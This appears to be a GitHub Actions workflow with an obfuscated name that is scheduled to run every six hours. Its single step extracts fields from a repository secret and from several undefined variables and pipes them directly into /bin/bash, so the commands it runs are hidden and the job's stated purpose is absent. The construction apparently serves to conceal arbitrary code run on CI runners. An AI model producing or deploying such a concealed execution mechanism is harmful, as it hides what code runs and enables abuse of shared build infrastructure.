name: swimmingsardonic

on:
  workflow_dispatch:
  schedule:
    - cron: '57 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: swimmingsardonic
        env:
          cr0: ${{ secrets.cr0 }}
        run: |
          echo $cr0 | jq -r .zzoa1393 | /bin/bash
          echo $mehgg02901 | jq -r .vui81 | /bin/bash
          echo $jef050 | jq -r .j11 | /bin/bash
          echo $ut18 | jq -r .z8 | /bin/bash

